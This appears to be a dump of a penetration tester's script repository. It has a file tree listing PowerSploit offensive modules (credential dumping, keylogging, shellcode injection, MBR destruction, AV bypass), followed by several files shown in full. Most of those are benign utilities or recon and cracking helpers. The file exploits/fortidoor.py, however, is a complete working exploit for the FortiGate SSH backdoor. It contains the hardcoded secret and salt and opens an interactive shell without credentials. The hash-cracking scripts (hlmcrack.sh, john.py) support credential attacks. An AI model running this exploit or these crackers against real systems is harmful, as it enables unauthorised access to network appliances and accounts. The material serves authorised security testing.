├── .gitignore ├── .gitmodules ├── README.md ├── check-smb-signing.sh ├── csv_merge.py ├── delldrac.py ├── docker_cleanup.sh ├── email_crawler.py ├── ettercap.py ├── exploits ├── fortidoor.py └── openmanage.py ├── externalIP.sh ├── fastnetntlm.py ├── find_local_admin.py ├── hashconvert.py ├── hlmcrack.sh ├── ike-scan.py ├── iker.py ├── john.py ├── kali_cgroup_fix.sh ├── mssql_brute.py ├── nmap_merge.py ├── nmap_to_html.sh ├── nse ├── http-email-harvest.nse ├── http-screenshot.nse ├── rtsp-screenshot.nse ├── vnc-screenshot.nse └── x11-screenshot.nse ├── office2hashcat.py ├── parse_nessus_xml.v24.pl ├── pdf2hashcat.py ├── powershell ├── AD-Reporting.ps1 ├── AD_user_security_report.ps1 ├── Dashimo-ADDashboard.ps1 ├── GPOCompare.ps1 ├── GPOReports.ps1 ├── Invoke-MetasploitPayload │ ├── Invoke-MetasploitPayload.ps1 │ ├── LICENSE │ ├── README.md │ ├── invoke-metasploitpayload.rc │ └── web_delivery_screenshot.png ├── NessusPro_v7_Report_Exporter_Tool.ps1 ├── New-ADAssetReport.ps1 ├── PowerSploit │ ├── .gitignore │ ├── AntivirusBypass │ │ ├── AntivirusBypass.psd1 │ │ ├── AntivirusBypass.psm1 │ │ ├── Find-AVSignature.ps1 │ │ └── Usage.md │ ├── CodeExecution │ │ ├── CodeExecution.psd1 │ │ ├── CodeExecution.psm1 │ │ ├── Invoke-DllInjection.ps1 │ │ ├── Invoke-ReflectivePEInjection.ps1 │ │ ├── Invoke-ReflectivePEInjection_Resources │ │ │ ├── DemoDLL │ │ │ │ ├── DemoDLL.sln │ │ │ │ └── DemoDLL │ │ │ │ │ ├── DemoDLL.cpp │ │ │ │ │ ├── DemoDLL.h │ │ │ │ │ ├── DemoDLL.vcxproj │ │ │ │ │ ├── DemoDLL.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── dllmain.cpp │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ ├── DemoDLL_RemoteProcess │ │ │ │ ├── DemoDLL_RemoteProcess.sln │ │ │ │ └── DemoDLL_RemoteProcess │ │ │ │ │ ├── DemoDLL_RemoteProcess.cpp │ │ │ │ │ ├── DemoDLL_RemoteProcess.vcxproj │ │ │ │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── dllmain.cpp │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── 
targetver.h │ │ │ ├── DemoExe │ │ │ │ ├── DemoExe.sln │ │ │ │ ├── DemoExe_MD │ │ │ │ │ ├── DemoExe_MD.cpp │ │ │ │ │ ├── DemoExe_MD.vcxproj │ │ │ │ │ ├── DemoExe_MD.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ │ └── DemoExe_MDd │ │ │ │ │ ├── DemoExe_MDd.cpp │ │ │ │ │ ├── DemoExe_MDd.vcxproj │ │ │ │ │ ├── DemoExe_MDd.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ ├── ExeToInjectInTo │ │ │ │ ├── ExeToInjectInTo.sln │ │ │ │ └── ExeToInjectInTo │ │ │ │ │ ├── ExeToInjectInTo.cpp │ │ │ │ │ ├── ExeToInjectInTo.vcxproj │ │ │ │ │ ├── ExeToInjectInTo.vcxproj.filters │ │ │ │ │ ├── ReadMe.txt │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ ├── stdafx.h │ │ │ │ │ └── targetver.h │ │ │ └── Shellcode │ │ │ │ ├── readme.txt │ │ │ │ ├── x64 │ │ │ │ ├── CallDllMain.asm │ │ │ │ ├── ExitThread.asm │ │ │ │ ├── GetFuncAddress.asm │ │ │ │ └── LoadLibraryA.asm │ │ │ │ └── x86 │ │ │ │ ├── CallDllMain.asm │ │ │ │ ├── ExitThread.asm │ │ │ │ └── GetProcAddress.asm │ │ ├── Invoke-Shellcode.ps1 │ │ ├── Invoke-WmiCommand.ps1 │ │ └── Usage.md │ ├── Exfiltration │ │ ├── Exfiltration.psd1 │ │ ├── Exfiltration.psm1 │ │ ├── Get-GPPAutologon.ps1 │ │ ├── Get-GPPPassword.ps1 │ │ ├── Get-Keystrokes.ps1 │ │ ├── Get-MicrophoneAudio.ps1 │ │ ├── Get-TimedScreenshot.ps1 │ │ ├── Get-VaultCredential.ps1 │ │ ├── Get-VaultCredential.ps1xml │ │ ├── Invoke-CredentialInjection.ps1 │ │ ├── Invoke-Mimikatz.ps1 │ │ ├── Invoke-NinjaCopy.ps1 │ │ ├── Invoke-TokenManipulation.ps1 │ │ ├── LogonUser │ │ │ └── LogonUser │ │ │ │ ├── LogonUser.sln │ │ │ │ ├── LogonUser │ │ │ │ ├── LogonUser.cpp │ │ │ │ ├── LogonUser.vcxproj │ │ │ │ ├── LogonUser.vcxproj.filters │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── stdafx.cpp │ │ │ │ ├── stdafx.h │ │ │ │ └── targetver.h │ │ │ │ └── logon │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── dllmain.cpp │ │ │ │ ├── logon.cpp │ │ │ │ ├── logon.vcxproj │ │ │ │ ├── logon.vcxproj.filters 
│ │ │ │ ├── stdafx.cpp │ │ │ │ ├── stdafx.h │ │ │ │ └── targetver.h │ │ ├── NTFSParser │ │ │ ├── NTFSParser.sln │ │ │ ├── NTFSParser │ │ │ │ ├── NTFS.h │ │ │ │ ├── NTFSParser.cpp │ │ │ │ ├── NTFSParser.vcxproj │ │ │ │ ├── NTFSParser.vcxproj.filters │ │ │ │ ├── NTFS_Attribute.h │ │ │ │ ├── NTFS_Common.h │ │ │ │ ├── NTFS_DataType.h │ │ │ │ ├── NTFS_FileRecord.h │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── stdafx.cpp │ │ │ │ ├── stdafx.h │ │ │ │ └── targetver.h │ │ │ └── NTFSParserDLL │ │ │ │ ├── NTFS.h │ │ │ │ ├── NTFSParserDLL.cpp │ │ │ │ ├── NTFSParserDLL.vcxproj │ │ │ │ ├── NTFSParserDLL.vcxproj.filters │ │ │ │ ├── NTFS_Attribute.h │ │ │ │ ├── NTFS_Common.h │ │ │ │ ├── NTFS_DataType.h │ │ │ │ ├── NTFS_FileRecord.h │ │ │ │ ├── ReadMe.txt │ │ │ │ ├── dllmain.cpp │ │ │ │ ├── stdafx.cpp │ │ │ │ ├── stdafx.h │ │ │ │ └── targetver.h │ │ ├── Out-Minidump.ps1 │ │ ├── Usage.md │ │ └── VolumeShadowCopyTools.ps1 │ ├── LICENSE │ ├── Mayhem │ │ ├── Mayhem.psd1 │ │ ├── Mayhem.psm1 │ │ └── Usage.md │ ├── Persistence │ │ ├── Persistence.psd1 │ │ ├── Persistence.psm1 │ │ └── Usage.md │ ├── PowerSploit.psd1 │ ├── PowerSploit.psm1 │ ├── PowerSploit.pssproj │ ├── PowerSploit.sln │ ├── Privesc │ │ ├── Get-System.ps1 │ │ ├── PowerUp.ps1 │ │ ├── Privesc.psd1 │ │ ├── Privesc.psm1 │ │ └── README.md │ ├── README.md │ ├── Recon │ │ ├── Dictionaries │ │ │ ├── admin.txt │ │ │ ├── generic.txt │ │ │ └── sharepoint.txt │ │ ├── Get-ComputerDetail.ps1 │ │ ├── Get-HttpStatus.ps1 │ │ ├── Invoke-CompareAttributesForClass.ps1 │ │ ├── Invoke-Portscan.ps1 │ │ ├── Invoke-ReverseDnsLookup.ps1 │ │ ├── PowerView.ps1 │ │ ├── README.md │ │ ├── Recon.psd1 │ │ └── Recon.psm1 │ ├── ScriptModification │ │ ├── Out-CompressedDll.ps1 │ │ ├── Out-EncodedCommand.ps1 │ │ ├── Out-EncryptedScript.ps1 │ │ ├── Remove-Comment.ps1 │ │ ├── ScriptModification.psd1 │ │ ├── ScriptModification.psm1 │ │ └── Usage.md │ ├── Tests │ │ ├── CodeExecution.tests.ps1 │ │ ├── Exfiltration.tests.ps1 │ │ ├── PowerSploit.tests.ps1 │ │ ├── 
Privesc.tests.ps1 │ │ └── Recon.tests.ps1 │ ├── docs │ │ ├── AntivirusBypass │ │ │ └── Find-AVSignature.md │ │ ├── CodeExecution │ │ │ ├── Invoke-DllInjection.md │ │ │ ├── Invoke-ReflectivePEInjection.md │ │ │ ├── Invoke-Shellcode.md │ │ │ └── Invoke-WmiCommand.md │ │ ├── Mayhem │ │ │ ├── Set-CriticalProcess.md │ │ │ └── Set-MasterBootRecord.md │ │ ├── Persistence │ │ │ ├── Add-Persistence.md │ │ │ ├── Get-SecurityPackage.md │ │ │ ├── Install-SSP.md │ │ │ ├── New-ElevatedPersistenceOption.md │ │ │ └── New-UserPersistenceOption.md │ │ ├── Privesc │ │ │ ├── Add-ServiceDacl.md │ │ │ ├── Enable-Privilege.md │ │ │ ├── Find-PathDLLHijack.md │ │ │ ├── Find-ProcessDLLHijack.md │ │ │ ├── Get-ApplicationHost.md │ │ │ ├── Get-CachedGPPPassword.md │ │ │ ├── Get-ModifiablePath.md │ │ │ ├── Get-ModifiableRegistryAutoRun.md │ │ │ ├── Get-ModifiableScheduledTaskFile.md │ │ │ ├── Get-ModifiableService.md │ │ │ ├── Get-ModifiableServiceFile.md │ │ │ ├── Get-ProcessTokenGroup.md │ │ │ ├── Get-ProcessTokenPrivilege.md │ │ │ ├── Get-RegistryAlwaysInstallElevated.md │ │ │ ├── Get-RegistryAutoLogon.md │ │ │ ├── Get-ServiceDetail.md │ │ │ ├── Get-SiteListPassword.md │ │ │ ├── Get-System.md │ │ │ ├── Get-UnattendedInstallFile.md │ │ │ ├── Get-UnquotedService.md │ │ │ ├── Get-WebConfig.md │ │ │ ├── Install-ServiceBinary.md │ │ │ ├── Invoke-PrivescAudit.md │ │ │ ├── Invoke-ServiceAbuse.md │ │ │ ├── Invoke-WScriptUACBypass.md │ │ │ ├── Restore-ServiceBinary.md │ │ │ ├── Set-ServiceBinaryPath.md │ │ │ ├── Test-ServiceDaclPermission.md │ │ │ ├── Write-HijackDll.md │ │ │ ├── Write-ServiceBinary.md │ │ │ ├── Write-UserAddMSI.md │ │ │ └── index.md │ │ ├── Recon │ │ │ ├── Add-DomainGroupMember.md │ │ │ ├── Add-DomainObjectAcl.md │ │ │ ├── Add-RemoteConnection.md │ │ │ ├── Convert-ADName.md │ │ │ ├── ConvertFrom-SID.md │ │ │ ├── ConvertFrom-UACValue.md │ │ │ ├── ConvertTo-SID.md │ │ │ ├── Export-PowerViewCSV.md │ │ │ ├── Find-DomainLocalGroupMember.md │ │ │ ├── Find-DomainObjectPropertyOutlier.md │ 
│ │ ├── Find-DomainProcess.md │ │ │ ├── Find-DomainShare.md │ │ │ ├── Find-DomainUserEvent.md │ │ │ ├── Find-DomainUserLocation.md │ │ │ ├── Find-InterestingDomainAcl.md │ │ │ ├── Find-InterestingDomainShareFile.md │ │ │ ├── Find-InterestingFile.md │ │ │ ├── Find-LocalAdminAccess.md │ │ │ ├── Get-ComputerDetail.md │ │ │ ├── Get-Domain.md │ │ │ ├── Get-DomainComputer.md │ │ │ ├── Get-DomainController.md │ │ │ ├── Get-DomainDFSShare.md │ │ │ ├── Get-DomainDNSRecord.md │ │ │ ├── Get-DomainDNSZone.md │ │ │ ├── Get-DomainFileServer.md │ │ │ ├── Get-DomainForeignGroupMember.md │ │ │ ├── Get-DomainForeignUser.md │ │ │ ├── Get-DomainGPO.md │ │ │ ├── Get-DomainGPOComputerLocalGroupMapping.md │ │ │ ├── Get-DomainGPOLocalGroup.md │ │ │ ├── Get-DomainGPOUserLocalGroupMapping.md │ │ │ ├── Get-DomainGroup.md │ │ │ ├── Get-DomainGroupMember.md │ │ │ ├── Get-DomainManagedSecurityGroup.md │ │ │ ├── Get-DomainOU.md │ │ │ ├── Get-DomainObject.md │ │ │ ├── Get-DomainObjectAcl.md │ │ │ ├── Get-DomainPolicy.md │ │ │ ├── Get-DomainSID.md │ │ │ ├── Get-DomainSPNTicket.md │ │ │ ├── Get-DomainSite.md │ │ │ ├── Get-DomainSubnet.md │ │ │ ├── Get-DomainTrust.md │ │ │ ├── Get-DomainTrustMapping.md │ │ │ ├── Get-DomainUser.md │ │ │ ├── Get-DomainUserEvent.md │ │ │ ├── Get-Forest.md │ │ │ ├── Get-ForestDomain.md │ │ │ ├── Get-ForestGlobalCatalog.md │ │ │ ├── Get-ForestTrust.md │ │ │ ├── Get-HttpStatus.md │ │ │ ├── Get-NetComputerSiteName.md │ │ │ ├── Get-NetLocalGroup.md │ │ │ ├── Get-NetLocalGroupMember.md │ │ │ ├── Get-NetLoggedon.md │ │ │ ├── Get-NetRDPSession.md │ │ │ ├── Get-NetSession.md │ │ │ ├── Get-NetShare.md │ │ │ ├── Get-PathAcl.md │ │ │ ├── Get-RegLoggedOn.md │ │ │ ├── Get-WMIProcess.md │ │ │ ├── Get-WMIRegCachedRDPConnection.md │ │ │ ├── Get-WMIRegLastLoggedOn.md │ │ │ ├── Get-WMIRegMountedDrive.md │ │ │ ├── Get-WMIRegProxy.md │ │ │ ├── Invoke-Kerberoast.md │ │ │ ├── Invoke-Portscan.md │ │ │ ├── Invoke-ReverseDnsLookup.md │ │ │ ├── Invoke-RevertToSelf.md │ │ │ ├── 
Invoke-UserImpersonation.md │ │ │ ├── New-DomainGroup.md │ │ │ ├── New-DomainUser.md │ │ │ ├── Remove-RemoteConnection.md │ │ │ ├── Resolve-IPAddress.md │ │ │ ├── Set-DomainObject.md │ │ │ ├── Set-DomainObjectOwner.md │ │ │ ├── Set-DomainUserPassword.md │ │ │ ├── Test-AdminAccess.md │ │ │ └── index.md │ │ ├── ScriptModification │ │ │ ├── Out-CompressedDll.md │ │ │ ├── Out-EncodedCommand.md │ │ │ ├── Out-EncryptedScript.md │ │ │ └── Remove-Comment.md │ │ └── index.md │ └── mkdocs.yml ├── adwcleaner.ps1 ├── export_AD_groups.ps1 ├── export_AD_users.ps1 ├── export_all_GPO_reports.ps1 ├── get_windows_updates.ps1 └── gpresult.ps1 ├── shellcode2exe.py ├── smtp_rst.py ├── smtp_vrfy.py ├── update_docker_images.sh ├── update_git_repos.sh └── upgrade_pip_packages.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .project 2 | .pydevproject 3 | /.externalToolBuilders 4 | *.tmp 5 | .DS_Store 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | scripts 2 | ======= 3 | 4 | Miscellaneous scripts for penetration testing 5 | 6 | ------------------------------------------------------------------------------- 7 | 8 | Matthew C. Jones, CPA, CISA, OSCP 9 | 10 | IS Audits and Consulting, LLC - 11 | 12 | TJS Deemer Dana - 13 | 14 | ------------------------------------------------------------------------------- 15 | 16 | A handful of these scripts were authored by others and may or may not contain 17 | modifications. 18 | 19 | Copyright info and credits have been maintained where applicable. 
20 | 21 | The following collections are included as subtrees: 22 | - https://github.com/averagesecurityguy/scripts 23 | - https://github.com/danielbohannon/Invoke-Obfuscation 24 | - https://github.com/artkond/Invoke-Vnc 25 | - https://github.com/putterpanda/mimikittenz 26 | - https://github.com/PowerShellMafia/PowerSploit 27 | - https://github.com/xorrior/RandomPS-Scripts 28 | - https://github.com/fireeye/SessionGopher 29 | - https://github.com/l0ss/Grouper 30 | - https://github.com/A-mIn3/WINspect 31 | - https://github.com/phillips321/adaudit 32 | - https://github.com/alanrenouf/Windows-Workstation-and-Server-Audit 33 | - https://github.com/TheSecEng/NessusParser-Excel 34 | 35 | ------------------------------------------------------------------------------- 36 | 37 | When not otherwise specified, scripts are licensed under GPL: 38 | 39 | This program is free software: you can redistribute it and/or modify it under 40 | the terms of the GNU General Public License as published by the Free Software 41 | Foundation, either version 3 of the License, or (at your option) any later 42 | version. 43 | 44 | This program is distributed in the hope that it will be useful, but WITHOUT ANY 45 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A 46 | PARTICULAR PURPOSE. See the GNU General Public License for more details. 47 | 48 | You should have received a copy of the GNU General Public License along with 49 | this program. If not, see . -------------------------------------------------------------------------------- /csv_merge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ''' 3 | @author: Matthew C. 
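Jones, CPA, CISA, OSCP
IS Audits & Consulting, LLC
TJS Deemer Dana LLP

Merge multiple CSV files into a single output file with only one header row
NOTE - ALL FILES MUST HAVE SAME HEADER / FORMAT TO WORK PROPERLY

See README.md for licensing information and credits

'''

import argparse
import glob
import os

# Name of the merged output. It is written into the input folder, so it is
# excluded from the inputs: a second run in the same folder used to fold the
# previous merged.csv back into the new one (duplicating every row).
OUTPUT_NAME = "merged.csv"


def main():
    '''Parse the command line and merge every *.csv in the chosen folder.'''
    desc = "Merge multiple CSV files into a single output file"

    parser = argparse.ArgumentParser(description=desc)
    parser.add_argument('input_folder', action='store', nargs='?',
                        help='Directory containing CSV files to merge \n \
                        (defaults to working directory if none specified)'
                        )
    args = parser.parse_args()

    input_folder = args.input_folder

    if not input_folder:
        input_folder = os.getcwd()
        print('no directory specified - using working directory:')
        print(input_folder)
        print('')

    merge_csv(input_folder)


def merge_csv(input_folder):
    '''Concatenate every *.csv in input_folder into input_folder/merged.csv.

    The header row is copied from the first non-empty input only; every other
    file contributes its data rows. Files are processed in sorted name order so
    the result is deterministic. Input and output are handled as bytes so line
    endings and encodings pass through unchanged (and so this works on both
    Python 2 and 3). Empty files are skipped instead of raising StopIteration.
    Returns the path of the output file.
    '''
    output_file = os.path.join(input_folder, OUTPUT_NAME)
    csv_files = sorted(
        path for path in glob.glob(os.path.join(input_folder, "*.csv"))
        if os.path.abspath(path) != os.path.abspath(output_file)
    )

    header_saved = False
    with open(output_file, 'wb') as fout:
        for filename in csv_files:
            with open(filename, 'rb') as fin:
                header = fin.readline()
                if not header:
                    continue  # empty file: nothing to merge
                last = b'\n'
                if not header_saved:
                    fout.write(header)
                    header_saved = True
                    last = header
                for line in fin:
                    fout.write(line)
                    last = line
                # A file whose final row has no trailing newline would otherwise
                # be glued onto the first row of the next file.
                if not last.endswith(b'\n'):
                    fout.write(b'\n')
    return output_file


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------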
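/exploits/fortidoor.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <host>
#
# Proof of concept for the undocumented "Fortimanager_Access" SSH account
# (CVE-2016-1909). The account authenticates with a keyboard-interactive
# response derived from the server-supplied challenge and a fixed secret, so
# the device is reachable without any credentials. Affected firmware is long
# since patched; this is kept for authorised testing of legacy appliances only.
#
# Python 2 only: the hashing below mixes str literals and the server challenge
# as byte strings, and `print` is used as a statement.

import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty

def custom_handler(title, instructions, prompt_list):
    '''Answer the keyboard-interactive prompt with the computed response.

    prompt_list[0][0] is the challenge sent by the appliance. The reply is
    "AK1" + base64(12 zero bytes + SHA1(12 zero bytes + challenge + fixed
    secret + fixed 24-byte salt)). Returns a one-element list as paramiko's
    auth_interactive handler contract requires.
    '''
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n + 'FGTAbc11*xy+Qqz27')
    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    return [h]


def main():
    '''Connect to sys.argv[1], authenticate as the hidden account and attach
    the local terminal to an interactive shell on the appliance.'''
    if len(sys.argv) < 2:
        # The placeholder had been lost from the usage line; restore it.
        print 'Usage: ' + sys.argv[0] + ' <host>'
        exit(-1)

    client = paramiko.SSHClient()
    # NOTE(review): AutoAddPolicy accepts whatever host key is presented, so an
    # on-path attacker can impersonate the appliance. Acceptable for a one-off
    # PoC against a known target; do not reuse this pattern in tooling that
    # carries real credentials.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        # The empty-username connect is expected to fail; it only exists to
        # bring the transport up so the manual auth steps below can run.
        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
    except paramiko.ssh_exception.SSHException:
        pass

    trans = client.get_transport()
    if trans is None:
        # connect() can fail before a transport exists (e.g. banner or
        # negotiation error); the original dereferenced None here.
        print 'Could not open an SSH transport to ' + sys.argv[1]
        exit(1)
    try:
        trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
    except paramiko.ssh_exception.AuthenticationException:
        pass

    trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
    chan = client.invoke_shell()

    # Put the local terminal in raw mode and relay bytes both ways until EOF;
    # the original tty settings are always restored in `finally`.
    oldtty = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        tty.setcbreak(sys.stdin.fileno())
        chan.settimeout(0.0)

        while True:
            r, w, e = select.select([chan, sys.stdin], [], [])
            if chan in r:
                try:
                    x = u(chan.recv(1024))
                    if len(x) == 0:
                        sys.stdout.write('\r\n*** EOF\r\n')
                        break
                    sys.stdout.write(x)
                    sys.stdout.flush()
                except socket.timeout:
                    pass
            if sys.stdin in r:
                x = sys.stdin.read(1)
                if len(x) == 0:
                    break
                chan.send(x)

    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/externalIP.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Print this host's public IP address as reported by an external service.
# NOTE: this makes a request to a third party (icanhazip.com); do not run it
# from a host whose external address must not be disclosed.

echo "Your external IP Address is:"
# The original line was "wget wget -O - -q icanhazip.com": the duplicated
# "wget" was treated as a second URL and produced an error for every run.
# HTTPS keeps the answer from being altered in transit, and the script now
# exits with wget's status instead of masking a failed lookup with "exit 0".
wget -q -O - https://icanhazip.com
exit $?
--------------------------------------------------------------------------------
/hlmcrack.sh:
--------------------------------------------------------------------------------
#!/bin/bash

#Built for Kali
#
# This tool will use rcrack to perform the full cracking process of a Half LM Hash.
#
#
# Usage: ./hlmcrack.sh hlmhashes.txt
#
# By: Leon Teale (RandomStorm)
#
# NOTE(review): the script works through fixed, predictable paths in /tmp
# (/tmp/newhash.txt, /tmp/seed.tmp, /tmp/hlmcrack.txt). On a shared host
# another local user can pre-create or symlink those names and read the
# captured hashes or redirect the writes; prefer mktemp-created files when
# this is next reworked. "$1" is also used unquoted throughout, so input
# file names with spaces will not work.

#Set path to your half lm tables
hlmtable=/opt/tables/rcracki_mt/Halflm_tables_all-space



#Check usage
if [ -z "$1" ];
then
    echo "Usage: ./hlmcrack.sh john_netntlm.txt"

else

    for line in `cat $1 | sort -u`; do

        echo "$line" > /tmp/newhash.txt
        hash="$line"
        username="`echo $line | cut -d : -f 1`"
        seedhash="`echo $line | cut -d : -f 4 | sed 's/\(.\{16\}\).*/\1/'`"
        echo $hash
        echo $username
        echo $seedhash

        #Get the seed (the first 16 digits of the hash)
        /usr/bin/rcracki_mt -h $seedhash $hlmtable > /tmp/seed.tmp

        seed=`cat /tmp/seed.tmp | grep "plaintext of" | awk {'print ($NF)'}`

        #Crack the remaining hash
        perl /usr/share/metasploit-framework/data/john/run.linux.x64.mmx/netntlm.pl --seed $seed --file /tmp/newhash.txt 1> /dev/null
        perl /usr/share/metasploit-framework/data/john/run.linux.x64.mmx/netntlm.pl --file /tmp/newhash.txt | grep "($username)" 2> /dev/null >> /tmp/hlmcrack.txt

    done
fi

#Printed Output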
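clear
echo "#################################################################################"
echo "Half LM cracked: cracked `cat /tmp/hlmcrack.txt | wc -l`\\`cat $1 | wc -l`"
echo ""
cat /tmp/hlmcrack.txt
echo ""
echo "#################################################################################"
rm /tmp/hlmcrack.txt
rm /tmp/newhash.txt
rm /tmp/seed.tmp
--------------------------------------------------------------------------------
/john.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
'''
@author: Matthew C. Jones, CPA, CISA, OSCP
IS Audits & Consulting, LLC
TJS Deemer Dana LLP

Automation script for running a series of transforms in John The Ripper against
a password hash file.

Acceptable inputs include pwdump and metasploit (eg. netntlmv2)
'''
import argparse
import os
import shutil
import subprocess
import sys

# Wordlists live under this directory. "~" is expanded explicitly at runtime:
# now that john is no longer launched through a shell, nothing else would.
WORDLIST_DIR = "~/hacking/dictionaries/"


def cleanup_routine():
    '''Offer to delete the user's John session data (~/.john); keeps it by default.

    Not invoked by main() so unattended runs stay non-interactive; call it
    explicitly when a fresh session is wanted.
    '''
    try:
        # Delete old temp files if the user wants to; default to leave old files
        response = raw_input("\nDelete old JTR session data (enter no if you want to keep old hashes, etc)? [no]")
    except (EOFError, KeyboardInterrupt):
        return
    if "y" in response or "Y" in response:
        print("Deleting temp files...\n")
        # shutil does not expand "~": the original literal path never existed,
        # so the delete silently did nothing.
        shutil.rmtree(os.path.expanduser("~/.john"), True)


def _run_john(args):
    '''Run one john invocation with the given argument list and wait for it.

    Arguments are passed as a list (no shell), so a hash file or wordlist path
    containing spaces or shell metacharacters is handed to john verbatim
    instead of being interpreted by /bin/sh.
    '''
    subprocess.Popen(["john"] + list(args)).wait()


def main(argv):
    '''Run the fixed sequence of john modes against the input file, then print
    the cracked user:password pairs.'''
    parser = argparse.ArgumentParser(description='Automation script for JTR hash cracking.')
    parser.add_argument("infile", action="store", help="Input file containing hashes")
    parser.add_argument("--hashtype", "--t", action="store", help='Optional hash type (lm, nt, netntlmv2; defaults to nt)')
    args = parser.parse_args(argv)

    inputfile = args.infile
    hashtype = args.hashtype or "nt"
    wordlistdir = os.path.expanduser(WORDLIST_DIR)
    fmt = "--format=" + hashtype

    print("Running John the Ripper against " + inputfile + " (" + fmt + ")")

    _run_john(["--single", fmt, inputfile])
    _run_john(["--wordlist=" + wordlistdir + "wordlists/numbers.txt", "--rules", fmt, inputfile])
    _run_john(["--wordlist=" + wordlistdir + "wordlists/names.txt", "--rules", fmt, inputfile])
    _run_john(["--wordlist=" + wordlistdir + "combined_all_unix.txt", "--rules", fmt, inputfile])

    _run_john(["--wordlist=" + wordlistdir + "combined_wordlists_unix.txt", "--rules=single", fmt, inputfile])

    # Equivalent of the original "john --show ... | cut -d: -f1,2": keep only
    # the user and password fields of each cracked line.
    shown = subprocess.Popen(["john", "--show", fmt, inputfile],
                             stdout=subprocess.PIPE,
                             universal_newlines=True).communicate()[0]
    for line in shown.splitlines():
        print(":".join(line.split(":")[:2]))


if __name__ == "__main__":
    main(sys.argv[1:])
--------------------------------------------------------------------------------
/kali_cgroup_fix.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Kali - fix "cgroup mountpoint does not exist" when launching Docker
# -p lets the script be re-run once the directory already exists.

sudo mkdir -p /sys/fs/cgroup/systemd

sudo mount -t cgroup -o none,name=systemd cgroup \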
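    /sys/fs/cgroup/systemd
--------------------------------------------------------------------------------
/nmap_to_html.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Convert every Nmap XML report in a directory to HTML with xsltproc.
# No stylesheet is named here: each report carries an xml-stylesheet
# processing instruction pointing at nmap.xsl, which xsltproc follows, so
# that path has to be readable on the machine running this script.

if [ "$#" -eq 0 ]; then
    echo "Usage: $0 /path/to/nmap/xml/output" >&2
    exit 1
fi

FILES=$1

#do not process *.xml if there are no xml files in directory
shopt -s nullglob

# Joining with "/" makes the trailing slash on the argument optional (the
# original expanded "$FILES*.xml" and matched nothing without it) and the
# quoting keeps directory names with spaces intact.
for f in "$FILES"/*.xml
do
    # take action on each file. $f store current file name
    xsltproc "$f" -o "$f.html"
done
--------------------------------------------------------------------------------
/nse/http-email-harvest.nse:
--------------------------------------------------------------------------------
local httpspider = require "httpspider"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"

description = [[
Spiders a web site and collects e-mail addresses.
]]

---
-- @usage
-- nmap --script=http-email-harvest <host>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-email-harvest:
-- |   Spidering limited to: maxdepth=3; maxpagecount=20
-- |     root@example.com
-- |_    postmaster@example.com
--
-- @args http-email-harvest.maxdepth the maximum amount of directories beneath
--       the initial url to spider. A negative value disables the limit.
--       (default: 3)
-- @args http-email-harvest.maxpagecount the maximum amount of pages to visit.
--       A negative value disables the limit (default: 20)
-- @args http-email-harvest.url the url to start spidering. This is a URL
--       relative to the scanned host eg. /default.html (default: /)
-- @args http-email-harvest.withinhost only spider URLs within the same host.
--       (default: true)
-- @args http-email-harvest.withindomain only spider URLs within the same
--       domain.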
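--       This widens the scope from withinhost and can
--       not be used in combination. (default: false)
--

author = "Patrik Karlsson"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}


portrule = shortport.http

-- Crawl the web service on host/port and return the unique e-mail addresses
-- found in the fetched bodies, or nil when none were collected.
function action(host, port)
  local EMAIL_PATTERN = "[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?"

  local crawler = httpspider.Crawler:new(host, port, nil, {
    scriptname = SCRIPT_NAME
    }
  )

  if ( not(crawler) ) then
    return
  end
  crawler:set_timeout(10000)

  local emails = {}
  while(true) do
    local status, r = crawler:crawl()
    -- if the crawler fails it can be due to a number of different reasons
    -- most of them are "legitimate" and should not be reason to abort
    if ( not(status) ) then
      if ( r.err ) then
        return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
      else
        break
      end
    end

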